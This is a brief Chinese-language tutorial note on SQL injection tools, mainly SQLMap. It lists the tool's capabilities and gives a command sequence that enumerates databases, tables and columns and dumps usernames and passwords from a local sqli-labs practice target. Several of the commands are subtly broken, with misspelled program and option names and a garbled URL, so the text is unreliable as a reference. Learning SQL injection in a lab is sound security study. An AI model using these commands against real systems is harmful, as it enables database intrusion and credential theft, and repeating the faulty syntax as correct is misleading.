SQL注入工具
SQLMap,阿D,名小子
SQLMap:开源的自动化SQL注入工具,由Pythonn写成.
1.完全支持多种数据库管理系统:
MySQL、Oracle、PostgreSQL、Microsoft SQL Server、
Microsoft Access、IBM DB2、SQLite、Firebird、Sybase
、SAP MaxDB、HSQLDB和Informix等
2.支持5种SQL注入技术:
联合查询注入,布尔注入,时间注入,报错注入,堆查询注入
3.支持枚举用户,密码,哈希,权限,角色,数据库,数据表和列
4.支持自动识别密码哈希格式并通过字典破解密码哈希.
SQLMap的使用
注入流程:查找注入点–>查库名–>查表名–>查字段名–>查重点数据
针对GET型
1.判断是否存在注入
slqmap.py -u "127.0.0.1/sqli-labs/Less-1/?id=1"
2.爆库
sqlmap.py -u "127.0.0.1/sqli-labs/Less-1/?id=1" --dbs
3.爆表
sqlmap.py -u "127.0.0.1/slqi-labs/Less-1/?id=1" --tables -D security
4.爆列
slqmap.py -u "127.0.0.1/sqli-labs/Less-1/?id=1" --colums -T users -D security
5.爆数据
sqlmap.py -u "127.0.0.qli-labs/Less-1/?id=1" --dump -C password,username -T users -D security
针对POST型
sqlmap,py -r 3.txt --dbs
